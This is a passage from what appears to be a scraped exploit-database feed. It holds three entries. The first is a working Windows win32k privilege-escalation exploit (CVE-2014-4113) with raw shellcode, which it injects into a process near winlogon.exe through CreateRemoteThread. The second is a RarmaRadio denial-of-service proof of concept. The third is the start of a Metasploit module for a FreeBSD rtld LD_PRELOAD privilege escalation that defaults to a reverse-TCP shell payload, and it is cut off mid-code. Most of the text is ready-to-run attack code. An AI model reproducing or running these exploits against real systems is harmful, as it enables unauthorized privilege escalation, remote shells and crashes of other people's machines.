,0x4C ,0x00 ,0x33 ,0x00 ,0x32 ,0x00 ,0x49 ,0xB9 ,0x2E ,\r\n\t0x00 ,0x44 ,0x00 ,0x4C ,0x00 ,0x4C ,0x00 ,0x66 ,0x0F ,0x1F ,0x84 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,\r\n\t0x66 ,0x83 ,0x78 ,0x58 ,0x18 ,0x48 ,0x8B ,0x48 ,0x60 ,0x72 ,0x25 ,0x48 ,0x8B ,0x11 ,0x49 ,0x3B ,\r\n\t0xD2 ,0x75 ,0x0C ,0x48 ,0x39 ,0x59 ,0x08 ,0x75 ,0x06 ,0x48 ,0x39 ,0x71 ,0x10 ,0x74 ,0x1E ,0x48 ,\r\n\t0x3B ,0xD5 ,0x75 ,0x0C ,0x4C ,0x39 ,0x41 ,0x08 ,0x75 ,0x06 ,0x4C ,0x39 ,0x49 ,0x10 ,0x74 ,0x0D ,\r\n\t0x48 ,0x8B ,0x00 ,0x48 ,0x3B ,0xC7 ,0x75 ,0xC8 ,0xE9 ,0x17 ,0x01 ,0x00 ,0x00 ,0x48 ,0x8B ,0x78 ,\r\n\t0x30 ,0x48 ,0x85 ,0xFF ,0x0F ,0x84 ,0x0A ,0x01 ,0x00 ,0x00 ,0x48 ,0x63 ,0x47 ,0x3C ,0xB9 ,0x4D ,\r\n\t0x5A ,0x00 ,0x00 ,0x66 ,0x39 ,0x0F ,0x0F ,0x85 ,0xF8 ,0x00 ,0x00 ,0x00 ,0x81 ,0x3C ,0x38 ,0x50 ,\r\n\t0x45 ,0x00 ,0x00 ,0x0F ,0x85 ,0xEB ,0x00 ,0x00 ,0x00 ,0x44 ,0x8B ,0x8C ,0x38 ,0x88 ,0x00 ,0x00 ,\r\n\t0x00 ,0x49 ,0x8B ,0xD6 ,0x4C ,0x03 ,0xCF ,0x45 ,0x8B ,0x41 ,0x20 ,0x41 ,0x8B ,0x49 ,0x18 ,0x4C ,\r\n\t0x03 ,0xC7 ,0x48 ,0x85 ,0xC9 ,0x74 ,0x32 ,0x48 ,0xBB ,0x43 ,0x72 ,0x65 ,0x61 ,0x74 ,0x65 ,0x50 ,\r\n\t0x72 ,0x49 ,0xBA ,0x72 ,0x6F ,0x63 ,0x65 ,0x73 ,0x73 ,0x41 ,0x00 ,0x0F ,0x1F ,0x44 ,0x00 ,0x00 ,\r\n\t0x41 ,0x8B ,0x04 ,0x90 ,0x48 ,0x39 ,0x1C ,0x38 ,0x75 ,0x07 ,0x4C ,0x39 ,0x54 ,0x38 ,0x07 ,0x74 ,\r\n\t0x08 ,0x48 ,0xFF ,0xC2 ,0x48 ,0x3B ,0xD1 ,0x72 ,0xE7 ,0x33 ,0xC0 ,0x48 ,0x3B ,0xD1 ,0x0F ,0x83 ,\r\n\t0x92 ,0x00 ,0x00 ,0x00 ,0x41 ,0x8B ,0x49 ,0x24 ,0x45 ,0x33 ,0xC0 ,0x48 ,0x03 ,0xCF ,0x0F ,0xB7 ,\r\n\t0x14 ,0x51 ,0x41 ,0x8B ,0x49 ,0x1C ,0x45 ,0x33 ,0xC9 ,0x48 ,0x03 ,0xCF ,0x44 ,0x8B ,0x14 ,0x91 ,\r\n\t0x48 ,0x89 ,0x44 ,0x24 ,0x58 ,0x48 ,0x89 ,0x44 ,0x24 ,0x60 ,0x4C ,0x03 ,0xD7 ,0x48 ,0x8D ,0x7C ,\r\n\t0x24 ,0x70 ,0xB9 ,0x68 ,0x00 ,0x00 ,0x00 ,0xF3 ,0xAA ,0xB8 ,0x05 ,0x00 ,0x00 ,0x00 ,0x49 ,0x8B ,\r\n\t0xD3 ,0x66 ,0x89 ,0x84 ,0x24 ,0xB0 ,0x00 ,0x00 ,0x00 ,0x48 ,0x8D ,0x44 ,0x24 ,0x50 ,0x33 ,0xC9 ,\r\n\t0x48 ,0x89 ,0x44 ,0x24 ,0x48 ,0x48 ,0x8D ,0x44 ,0x24 ,0x70 ,0x4C ,0x89 ,0x74 ,0x24 ,0x50 ,0x48 ,\r\n\t0x89 ,0x44 ,0x24 ,0x40 ,0x4C ,0x89 ,0x74 ,0x24 ,0x38 ,0x4C ,0x89 ,0x74 ,0x24 ,0x30 ,0xC7 ,0x44 ,\r\n\t0x24 ,0x28 ,0x10 ,0x00 ,0x00 ,0x00 ,0xC7 ,0x44 ,0x24 ,0x70 ,0x68 ,0x00 ,0x00 ,0x00 ,0xC7 ,0x84 ,\r\n\t0x24 ,0xAC ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0xC7 ,0x44 ,0x24 ,0x20 ,0x01 ,0x00 ,0x00 ,\r\n\t0x00 ,0x41 ,0xFF ,0xD2 ,0x33 ,0xC0 ,0x4C ,0x8D ,0x9C ,0x24 ,0xE0 ,0x00 ,0x00 ,0x00 ,0x49 ,0x8B ,\r\n\t0x5B ,0x20 ,0x49 ,0x8B ,0x6B ,0x38 ,0x49 ,0x8B ,0xE3 ,0x41 ,0x5E ,0x5F ,0x5E ,0xC3\r\n};\r\n\r\n\r\n\r\n\r\nHMENU __init_menu(\r\n\t)\r\n{\r\n\tHMENU hMenu_Ret=NULL;\r\n\tMENUITEMINFO mItem={0};\r\n\r\n\tdo \r\n\t{\r\n\t\tHMENU hme=CreatePopupMenu();\r\n\t\tif (hme==NULL){\r\n\t\t\tprintf(\"CreatePopupMenu()_1 fail:0x%x\\n\" ,GetLastError());\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\tmItem.cbSize=sizeof(MENUITEMINFO);\r\n\t\tmItem.fMask=(MIIM_STRING);\r\n\r\n\t\tbool bisok=InsertMenuItem(hme ,0 ,1 ,&mItem);\r\n\t\tif (bisok==false){\r\n\t\t\tprintf(\"InsertMenuItem()_1 fail:0x%x\\n\" ,GetLastError());\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\thMenu_Ret=CreatePopupMenu();\r\n\t\tif (hMenu_Ret==NULL){\r\n\t\t\tprintf(\"CreatePopupMenu()_2 fail:0x%x\\n\" ,GetLastError());\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\tMENUITEMINFO mi={0};\r\n\t\tmi.cbSize=sizeof(mi);\r\n\t\tmi.fMask=(MIIM_STRING|MIIM_SUBMENU);\r\n\t\tmi.hSubMenu=hme;\r\n\t\tmi.dwTypeData=\"\";\r\n\t\tmi.cch=1;\r\n\r\n\t\tbisok=InsertMenuItem(hMenu_Ret ,0 ,1 ,&mi);\r\n\t\tif (bisok==false){\r\n\t\t\tprintf(\"InsertMenuItem()_2 fail: 0x%x\\n\" ,GetLastError());\r\n\t\t}\r\n\r\n\t} while (false);\r\n\r\n\treturn hMenu_Ret;\r\n}\r\n\r\n\r\nPVOID __calc_sep_token_addr(\r\n\t)\r\n{\r\n\tNTSTATUS status;\r\n\tPSYSTEM_HANDLE_INFORMATION handleInfo=NULL;\r\n\tULONGLONG handleInfoSize = 0x10000 ,i ,ret_obj_addr=NULL; \r\n\r\n\tdo \r\n\t{\r\n\t\t_NtQuerySystemInformation NtQuerySystemInformation = \r\n\t\t\t(_NtQuerySystemInformation)GetProcAddress(LoadLibrary(\"ntdll.dll\"), \"NtQuerySystemInformation\");\r\n\r\n\t\t_NtDuplicateObject NtDuplicateObject =\r\n\t\t\t(_NtDuplicateObject)GetProcAddress(LoadLibrary(\"ntdll.dll\"), \"NtDuplicateObject\");\r\n\r\n\t\t_NtQueryObject NtQueryObject =\r\n\t\t\t(_NtQueryObject)GetProcAddress(LoadLibrary(\"ntdll.dll\"), \"NtQueryObject\");\r\n\r\n\r\n\t\tif (!NtQuerySystemInformation || !NtDuplicateObject || !NtQueryObject){\r\n\t\t\tprintf(\"get sys proc failed!\\n\");\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\thandleInfo = (PSYSTEM_HANDLE_INFORMATION)malloc(handleInfoSize);\r\n\r\n\t\twhile ((status = NtQuerySystemInformation(SystemHandleInformation,handleInfo,\r\n\t\t\thandleInfoSize,NULL)) == STATUS_INFO_LENGTH_MISMATCH)\r\n\t\t\thandleInfo = (PSYSTEM_HANDLE_INFORMATION)realloc(handleInfo, handleInfoSize *= 2);\r\n\r\n\t\tif (!NT_SUCCESS(status)){\r\n\t\t\tprintf(\"NtQuerySystemInformation failed!\\n\");\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\r\n\t\tPOBJECT_TYPE_INFORMATION objectTypeInfo=(POBJECT_TYPE_INFORMATION)malloc(0x1000);\r\n\r\n\t\tfor (i = 0; i < handleInfo->HandleCount; i++)\r\n\t\t{\r\n\t\t\tSYSTEM_HANDLE handle = handleInfo->Handles[i];\r\n\r\n\t\t\tif (handle.ProcessId != GetCurrentProcessId())\r\n\t\t\t\tcontinue;\r\n\r\n\t\t\tif (!NT_SUCCESS(NtQueryObject(\r\n\t\t\t\t(HANDLE)handle.Handle,\r\n\t\t\t\tObjectTypeInformation,\r\n\t\t\t\tobjectTypeInfo,\r\n\t\t\t\t0x1000,\r\n\t\t\t\tNULL\r\n\t\t\t\t)))\r\n\t\t\t{\r\n\t\t\t\tprintf(\"[%#x] Error!\\n\", handle.Handle);\r\n\t\t\t\tcontinue;\r\n\t\t\t}\r\n\r\n\t\t\tif (objectTypeInfo->Name.Buffer==NULL || objectTypeInfo->Name.Length==0)\r\n\t\t\t\tcontinue;\r\n\r\n\t\t\tif (wcscmp(objectTypeInfo->Name.Buffer ,L\"Token\"))\r\n\t\t\t\tcontinue;\r\n\r\n\t\t\tret_obj_addr=((ULONGLONG)handle.Object+0x40);\r\n\t\t}\r\n\r\n\t\tif (objectTypeInfo)\r\n\t\t\tfree(objectTypeInfo);\r\n\r\n\t\tif (handleInfo)\r\n\t\t\tfree(handleInfo);\r\n\r\n\t} while (false);\r\n\r\n\treturn (PVOID)ret_obj_addr;\r\n}\r\n\r\n\r\nULONGLONG __calc_pid(\r\n\t)\r\n{\r\n\tNTSTATUS status;\r\n\tPSYSTEM_PROCESS_INFORMATION PsInfo=NULL;\r\n\tULONGLONG PsInfoSize = 0x10000 ,ret_pid=NULL; \r\n\r\n\tdo \r\n\t{\r\n\t\t_NtQuerySystemInformation NtQuerySystemInformation = \r\n\t\t\t(_NtQuerySystemInformation)GetProcAddress(LoadLibrary(\"ntdll.dll\"), \"NtQuerySystemInformation\");\r\n\r\n\r\n\t\tif (!NtQuerySystemInformation){\r\n\t\t\tprintf(\"get sys proc failed!\\n\");\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\tPsInfo = (PSYSTEM_PROCESS_INFORMATION)malloc(PsInfoSize);\r\n\r\n\t\twhile ((status = NtQuerySystemInformation(SystemProcessesAndThreadsInformation,PsInfo,\r\n\t\t\tPsInfoSize ,NULL)) == STATUS_INFO_LENGTH_MISMATCH)\r\n\t\t\tPsInfo = (PSYSTEM_PROCESS_INFORMATION)realloc(PsInfo, PsInfoSize*= 2);\r\n\r\n\t\tif (!NT_SUCCESS(status)){\r\n\t\t\tprintf(\"NtQuerySystemInformation failed!\\n\");\r\n\t\t\tbreak; \r\n\t\t}\r\n\r\n\t\tfor (;PsInfo->NextEntryDelta ;PsInfo = (PSYSTEM_PROCESS_INFORMATION)((ULONGLONG)PsInfo + PsInfo->NextEntryDelta))\r\n\t\t{\r\n\t\t\tif (PsInfo->ProcessName.Buffer==NULL || PsInfo->ProcessName.Length==0)\r\n\t\t\t\tcontinue;\r\n\r\n\t\t\tif (!wcscmp(PsInfo->ProcessName.Buffer ,L\"winlogon.exe\")){\r\n\t\t\t\tret_pid=PsInfo->InheritedFromProcessId;\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t} while (false);\r\n\r\n\treturn ret_pid;\r\n} \r\n\r\n\r\nULONGLONG __init_fake_wnd_pti(\r\n\t)\r\n{\r\n\tULONGLONG ret_pti=NULL;\r\n\tULONGLONG dst_proc_addr=NULL;\r\n\r\n\tdo \r\n\t{\r\n\t\tret_pti=(ULONGLONG)malloc(0x500);\r\n\t\tif (ret_pti==NULL){\r\n\t\t\tprintf(\"malloc fail!\\n\");\r\n\t\t\treturn NULL; \r\n\t\t}\r\n\r\n\t\t*(ULONGLONG*)(ret_pti+_oft_win32ps_pti)=0; //Win32Process\r\n\t\t*(DWORD*)(ret_pti+_oft_0420h_pti)=0;\t\t//not 0x20\r\n\t\t*(ULONGLONG*)(ret_pti+_oft_list_header_pti)=(ULONGLONG)__calc_sep_token_addr()-0x5; //TODO:\r\n\r\n\t\tvoid* tmpbuf=malloc(0x100); \r\n\t\tmemset(tmpbuf ,0 ,0x100);\r\n\t\t*(ULONGLONG*)(ret_pti+_oft_0188h_pti)=(ULONGLONG)tmpbuf; //buf addr(size >= 0x12) ,check in win32k!SetWakeBit\r\n\r\n\t} while (false);\r\n\r\n\treturn ret_pti;\r\n}\r\n\r\n\r\n\r\nbool __init_fake_tagWnd(\r\n\t)\r\n{\r\n\tbool bRet=false;\r\n\t_ZwAllocateVirtualMemory_pt pfn_ZwAllocateVm=NULL;\r\n\r\n\tdo \r\n\t{\r\n\t\tHMODULE hmd=LoadLibrary(\"ntdll.dll\");\r\n\t\tif (hmd==NULL)\r\n\t\t\tbreak;\r\n\r\n\t\tULONGLONG fake_tagwnd_pti=__init_fake_wnd_pti();\r\n\t\tif (fake_tagwnd_pti==NULL){\r\n\t\t\tprintf(\"__calc_wnd_pti() fail!\\n\");\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\r\n\t\tpfn_ZwAllocateVm=(_ZwAllocateVirtualMemory_pt)GetProcAddress(hmd ,\"ZwAllocateVirtualMemory\");\r\n\t\tif (pfn_ZwAllocateVm==NULL){\r\n\t\t\tprintf(\"pfn ZwAllocateVirtualMemery addr is NULL!\\n\");\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\tBYTE* fake_tagWnd_addr=(BYTE*)0xFFFFFFFB; size_t region_size=0x20000;\r\n\t\tNTSTATUS status=pfn_ZwAllocateVm(GetCurrentProcess() ,(PVOID*)&fake_tagWnd_addr ,0 ,®ion_size,\r\n\t\t\tMEM_RESERVE | MEM_COMMIT|MEM_TOP_DOWN ,PAGE_EXECUTE_READWRITE);\r\n\r\n\t\tif (status < 0){\r\n\t\t\tprintf(\"Allocate fake tagWnd fail!\\n\");\r\n\t\t\tbreak;;\r\n\t\t}\r\n\r\n\t\tULONGLONG ul_align=0xFFFFFFFBLL-(ULONGLONG)fake_tagWnd_addr;\r\n\t\tif (ul_align > 0x10000){\r\n\t\t\tprintf(\"alloc fake fail: %x!\\n\" ,fake_tagWnd_addr);\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\tmemset(fake_tagWnd_addr+ul_align ,0 ,0x1000);\r\n\r\n\t\t*(ULONGLONG*)(fake_tagWnd_addr+ul_align+_oft_idx_tagWND)=0x0;\r\n\t\t*(ULONGLONG*)(fake_tagWnd_addr+ul_align+_oft_pti_tagWnd)=fake_tagwnd_pti; //oft 0x170 == win32process\r\n\t\t*(ULONGLONG*)(fake_tagWnd_addr+ul_align+_oft_18h_tagWnd)=0x0; //0 ,check in IsWindowDesktopComposed\r\n\r\n\t\tbRet=true;\r\n\r\n\t} while (false);\r\n\r\n\treturn bRet;\r\n}\r\n\r\n\r\n\r\nLRESULT __stdcall __wh_wnd_proc( \r\n\tint code, \r\n\tWPARAM wparam,\r\n\tLPARAM lparam \r\n\t)\r\n{\r\n\tdo \r\n\t{\r\n\t\tCWPSTRUCT* lpm=(CWPSTRUCT*)lparam;\r\n\t\tif (lpm->message != MN_FINDWINDOWFROMPOINT || g_bis_mn_findwnded==true)\r\n\t\t\tbreak;\r\n\r\n\t\tg_bis_mn_findwnded=true;\r\n\r\n\t\tUnhookWindowsHook(WH_CALLWNDPROC ,__wh_wnd_proc);\r\n\r\n\t\tg_ori_wnd_proc=(WNDPROC)SetWindowLongPtr(lpm->hwnd ,GWLP_WNDPROC ,(LONG_PTR)__wnd_proc_sl);\r\n\r\n\t} while (false);\r\n\r\n\treturn CallNextHookEx(g_hhk ,code ,wparam ,lparam);\r\n}\r\n\r\n\r\n\r\n\r\nLRESULT __wnd_proc_sl( \r\n\tHWND hwnd,\r\n\tUINT umsg,\r\n\tWPARAM wparam, \r\n\tLPARAM lparam\r\n\t)\r\n{\r\n\tdo \r\n\t{\r\n\t\tif (umsg != MN_FINDWINDOWFROMPOINT )\r\n\t\t\tbreak;\r\n\r\n\t\tif (g_bis_endmenu)\r\n\t\t\tbreak;\r\n\r\n\t\tg_bis_endmenu=1;\r\n\r\n\t\tEndMenu();\r\n\t\treturn 0xFFFFFFFB;\r\n\r\n\t} while (false);\r\n\r\n\treturn CallWindowProc(g_ori_wnd_proc ,hwnd ,umsg ,wparam ,lparam);\r\n}\r\n\r\n\r\n\r\nLRESULT __stdcall __wnd_proc(\r\n\tHWND hwnd, \r\n\tUINT umsg, \r\n\tWPARAM wparam, \r\n\tLPARAM lparam\r\n\t)\r\n{\r\n\tif (umsg==WM_ENTERIDLE && g_bis_idled==FALSE)\r\n\t{\r\n\t\tg_bis_idled=TRUE;\r\n\t\tPostMessage(hwnd ,WM_KEYFIRST ,0x28 ,0); \r\n\t\tPostMessage(hwnd ,WM_KEYFIRST ,0X27 ,0); \r\n\t\tPostMessage(hwnd ,WM_LBUTTONDOWN ,0 ,0xff00ff); \r\n\t}\r\n\r\n\treturn DefWindowProc(hwnd ,umsg ,wparam ,lparam);\r\n}\r\n\r\n\r\nDWORD __stdcall __thread_plroc( \r\n\tvoid* param\r\n\t)\r\n{\r\n\tbool bisok=false;\r\n\tWNDCLASS wndcls={0};\r\n\r\n\tdo \r\n\t{\r\n\t\twndcls.lpfnWndProc=__wnd_proc;\r\n\t\twndcls.lpszClassName=\"cve_2014_4113\";\r\n\t\tRegisterClass(&wndcls);\r\n\r\n\t\tHWND hwnd=CreateWindowEx(0 ,wndcls.lpszClassName ,NULL ,0 ,0 ,0,\r\n\t\t\t200 ,200 ,NULL ,NULL ,NULL ,NULL);\r\n\t\tif (hwnd==NULL){\r\n\t\t\tprintf(\"CreateWindowEx() fail: 0x%x\\n\" ,GetLastError());\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\tHMENU hmenu=__init_menu();\r\n\t\tif (hmenu==NULL){\r\n\t\t\tprintf(\"__init_menu() fail: 0x%x\\n\" ,GetLastError());\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\t\r\n\t\tbool bisok=__init_fake_tagWnd();\r\n\t\tif (bisok==false){\r\n\t\t\tprintf(\"__init_fake_tagWnd() fail:0x%x\\n\" ,GetLastError());\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\t\r\n\t\tg_hhk=SetWindowsHookEx(WH_CALLWNDPROC ,__wh_wnd_proc ,NULL ,GetCurrentThreadId());\r\n\t\tif (g_hhk==NULL){\r\n\t\t\tprintf(\"SetWindowsHookEx() fail:0x%x\\n\" ,GetLastError());\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\tbisok=TrackPopupMenu(hmenu ,0 ,0x0FFFFD8F0 ,0x0FFFFD8F0 ,0 ,hwnd ,NULL);\r\n\t\tif (bisok==false){\r\n\t\t\tprintf(\"TrackPopupMenu() fail:0x%x\\n\" ,GetLastError());\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\tCloseHandle(hmenu);\r\n\r\n\t\tDestroyWindow(hwnd);\r\n\r\n\t} while (FALSE);\r\n\r\n\treturn 0;\r\n}\r\n\r\n\r\n\r\nint main(\r\n\tint argc ,char** argv\r\n\t)\r\n{\r\n\tbool bisok=false;\r\n\r\n\tdo \r\n\t{\r\n\t\tif (argc != 2){\r\n\t\t\tprintf(\"usage: xxx fpath\");\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\tHANDLE hProcessToken=NULL ,hRestrictedToken=NULL;\r\n\t\tif (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hProcessToken)) {\r\n\t\t\tprintf(\"Could not open process token\\n\");\r\n\t\t\tbreak; \r\n\t\t}\r\n\r\n\t\tif (!CreateRestrictedToken(hProcessToken, DISABLE_MAX_PRIVILEGE, 0, 0, 0, 0, 0, 0, &hRestrictedToken)){\r\n\t\t\tprintf(\"Could not create restricted token\\n\");\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\tif (!AdjustTokenPrivileges(hRestrictedToken, TRUE, NULL, 0, NULL, NULL)) {\r\n\t\t\tprintf(\"Could not adjust privileges\\n\");\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\t\r\n\t\tCloseHandle(hProcessToken);\r\n\r\n\t\tHANDLE hthread=CreateThread(NULL ,0 ,__thread_plroc ,NULL ,0 ,NULL);\r\n\t\tif (hthread==NULL){\r\n\t\t\tprintf(\"CreateThread() fail: 0x%x\\n\" ,GetLastError());\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\tWaitForSingleObject(hthread ,1000);\r\n\t\tTerminateThread(hthread ,0);\r\n\t\t\r\n\t\tif (!ImpersonateLoggedOnUser(hRestrictedToken)){\r\n\t\t\tprintf(\"ImpersonateLoggedOnUser failed!\\n\");\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\t\r\n\t\tPVOID pfn_cps=GetProcAddress(LoadLibrary(\"Kernel32.dll\") ,\"CreateProcessA\");\r\n\t\tif (pfn_cps==NULL){\r\n\t\t\tprintf(\"GetProcess CreateProcessA failed!\\n\");\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\t\r\n\t\tULONGLONG ul_pid_winlogon=__calc_pid();\r\n\t\tif (ul_pid_winlogon==NULL){\r\n\t\t\tprintf(\"__calc_winlogon_pid failed!\\n\");\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\r\n\t\tHANDLE hprocess=OpenProcess(PROCESS_ALL_ACCESS ,TRUE ,ul_pid_winlogon);\r\n\t\tif (hprocess==NULL){\r\n\t\t\tprintf(\"OpenProcess failed: %x\\n\" ,GetLastError());\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\r\n\t\t//init params\r\n\t\tPVOID params=VirtualAllocEx(hprocess ,NULL ,strlen(argv[1])+10 ,MEM_COMMIT ,PAGE_READWRITE);\r\n\t\tif (params==NULL){\r\n\t\t\tprintf(\"VirtualAllocEx failed:%x\\n\" ,GetLastError());\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\tULONGLONG ul_ret_wrt=0;\r\n\t\tbisok=WriteProcessMemory(hprocess ,params ,argv[1] ,strlen(argv[1])+2 ,(SIZE_T*)&ul_ret_wrt);\r\n\t\tif (bisok==false || ul_ret_wrt < strlen(argv[1])+2){\r\n\t\t\tprintf(\"WriteProcessMemory() failed!\\n\");\r\n\t\t\tbreak;\r\n\t\t} \r\n\r\n\r\n\t\t//init shellcode\r\n\r\n\t\tPVOID shellcode=VirtualAllocEx(hprocess ,NULL ,0x220 ,MEM_COMMIT ,PAGE_EXECUTE_READWRITE);\r\n\t\tif (shellcode==NULL){\r\n\t\t\tprintf(\"VirtualAllocEx failed:%x\\n\" ,GetLastError());\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\tbisok=WriteProcessMemory(hprocess ,shellcode ,__s_code ,sizeof(__s_code) ,(SIZE_T*)&ul_ret_wrt);\r\n\t\tif (bisok==false || ul_ret_wrt < sizeof(__s_code)){\r\n\t\t\tprintf(\"WriteProcessMemory() failed!\\n\");\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\tDWORD dw_tid=0;\r\n\t\tHANDLE htd_rmt=CreateRemoteThread(hprocess ,NULL ,0 ,(LPTHREAD_START_ROUTINE )shellcode ,params ,0 ,&dw_tid);\r\n\t\tif (htd_rmt==NULL){\r\n\t\t\tprintf(\"CreateRemoteThread() fail!\\n\");\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\r\n\t\t//clear\r\n\r\n\t\tCloseHandle(htd_rmt);\r\n\r\n\t\tCloseHandle(hprocess);\r\n\r\n\t\tCloseHandle(hRestrictedToken);\r\n\r\n\t} while (false);\r\n\t\r\n\treturn 0;\r\n}\n\n# 0day.today [2019-05-31] #", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/32825"}, {"lastseen": "2019-05-24T12:03:43", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2019-05-23T00:00:00", "published": "2019-05-23T00:00:00", "id": "1337DAY-ID-32774", "href": "https://0day.today/exploit/description/32774", "title": "RarmaRadio 2.72.3 - (Server) Denial of Service Exploit", "type": "zdt", "sourceData": "#Exploit Title: RarmaRadio 2.72.3 - 'Server' Denial of Service (PoC)\r\n#Discovery by: Victor Mondrag\u00f3n\r\n#Vendor Homepage: http://www.raimersoft.com/\r\n#Software Link: www.raimersoft.com/downloads/rarmaradio_setup.exe\r\n#Tested Version: 2.72.3\r\n#Tested on: Windows 7 Service Pack 1 x64\r\n\r\n#Steps to produce the crash:\r\n#1.- Run python code: rarmaradio_server.py\r\n#2.- Open rarma_ser.txt and copy content to clipboard\r\n#3.- Open RarmaRadio\r\n#4.- Select \"Edit\" > \"Settings\" > \"Network\"\r\n#5.- In \"Server\" field paste Clipboard\r\n#6.- Select \"OK\"\r\n#7.- Crashed\r\n\r\ncod = \"\\x41\" * 4000\r\n\r\nf = open('rarma_ser.txt', 'w')\r\nf.write(cod)\r\nf.close()\n\n# 0day.today [2019-05-24] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32774"}, {"lastseen": "2019-05-22T13:56:13", "bulletinFamily": "exploit", "description": "This Metasploit module exploits a vulnerability in the FreeBSD run-time link-editor (rtld). The rtld unsetenv() function fails to remove LD_* environment variables if __findenv() fails. This can be abused to load arbitrary shared objects using LD_PRELOAD, resulting in privileged code execution.", "modified": "2019-05-22T00:00:00", "published": "2019-05-22T00:00:00", "id": "1337DAY-ID-32767", "href": "https://0day.today/exploit/description/32767", "title": "FreeBSD rtld execl() Privilege Escalation Exploit", "type": "zdt", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'FreeBSD rtld execl() Privilege Escalation',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in the FreeBSD\r\n run-time link-editor (rtld).\r\n\r\n The rtld `unsetenv()` function fails to remove `LD_*`\r\n environment variables if `__findenv()` fails.\r\n\r\n This can be abused to load arbitrary shared objects using\r\n `LD_PRELOAD`, resulting in privileged code execution.\r\n\r\n This module has been tested successfully on:\r\n\r\n FreeBSD 7.2-RELEASE (amd64); and\r\n FreeBSD 8.0-RELEASE (amd64).\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Kingcope', # Independent discovery, public disclosure, and exploit\r\n 'stealth', # Discovery and exploit (4b1717926ed0d4823622011625fb1824)\r\n 'bcoles' # Metasploit (using Kingcope's exploit code [modified])\r\n ],\r\n 'DisclosureDate' => '2009-11-30',\r\n 'Platform' => ['bsd'], # FreeBSD\r\n 'Arch' =>\r\n [\r\n ARCH_X86,\r\n ARCH_X64,\r\n ARCH_ARMLE,\r\n ARCH_AARCH64,\r\n ARCH_PPC,\r\n ARCH_MIPSLE,\r\n ARCH_MIPSBE\r\n ],\r\n 'SessionTypes' => ['shell'],\r\n 'References' =>\r\n [\r\n ['BID', '37154'],\r\n ['CVE', '2009-4146'],\r\n ['CVE', '2009-4147'],\r\n ['SOUNDTRACK', 'https://www.youtube.com/watch?v=dDnhthI27Fg'],\r\n ['URL', 'https://seclists.org/fulldisclosure/2009/Nov/371'],\r\n ['URL', 'https://c-skills.blogspot.com/2009/11/always-check-return-value.html'],\r\n ['URL', 'https://lists.freebsd.org/pipermail/freebsd-announce/2009-December/001286.html'],\r\n ['URL', 'https://xorl.wordpress.com/2009/12/01/freebsd-ld_preload-security-bypass/'],\r\n ['URL', 'https://securitytracker.com/id/1023250']\r\n ],\r\n 'Targets' => [['Automatic', {}]],\r\n 'DefaultOptions' =>\r\n {\r\n 'PAYLOAD' => 'bsd/x86/shell_reverse_tcp',\r\n 'PrependSetresuid' => true,\r\n 'PrependSetresgid' => true,\r\n 'PrependFork' => true,\r\n 'WfsDelay' => 10\r\n },\r\n 'DefaultTarget' => 0))\r\n register_options [\r\n OptString.new('SUID_EXECUTABLE', [ true, 'Path to a SUID executable', '/sbin/ping' ])\r\n ]\r\n register_advanced_options [\r\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\r\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\r\n ]\r\n end\r\n\r\n def base_dir\r\n datastore['WritableDir'].to_s\r\n end\r\n\r\n def suid_exe_path\r\n datastore['SUID_EXECUTABLE']\r\n end\r\n\r\n def upload(path, data)\r\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\r\n rm_f path\r\n write_file path, data\r\n register_file_for_cleanup path\r\n end\r\n\r\n def is_root?\r\n (cmd_exec('id -u').to_s.gsub(/[^\\d]/, '') == '0')\r\n end\r\n\r\n def check\r\n kernel_release = cmd_exec('uname -r').to_s\r\n unless kernel_release =~ /^(7\\.[012]|8\\.0)/\r\n vprint_error \"FreeBSD version #{kernel_release} is not vulnerable\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"FreeBSD version #{kernel_release} appears vulnerable\"\r\n\r\n unless command_exists? 'gcc'\r\n vprint_error 'gcc is not installed'\r\n return 